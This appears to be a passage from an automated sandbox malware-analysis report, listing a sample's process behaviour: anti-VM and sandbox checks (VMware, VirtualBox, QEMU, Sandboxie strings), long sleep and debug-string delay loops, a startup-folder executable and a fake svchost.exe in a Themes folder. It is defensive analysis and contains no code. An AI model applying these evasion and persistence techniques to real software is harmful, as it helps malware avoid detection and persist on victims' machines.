                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeSection loaded: OutputDebugStringW count: 112
                      Source: C:\Users\user\AppData\Roaming\srt.exeSection loaded: OutputDebugStringW count: 112
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeSection loaded: OutputDebugStringW count: 218
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                      Source: C:\Users\user\AppData\Roaming\srt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2684Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 2732Thread sleep count: 87 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 2696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 2904Thread sleep count: 86 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 3056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 2556Thread sleep count: 88 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2944Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1616Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2348Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2052Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3124Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe TID: 2144Thread sleep count: 94 > 30
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe TID: 3144Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_025F096A GetSystemInfo,4_2_025F096A
                      Source: C:\Users\user\AppData\Roaming\srt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\Jump to behavior
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 00000006.00000003.2095308405.00000000002B1000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: VMwareVBox
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
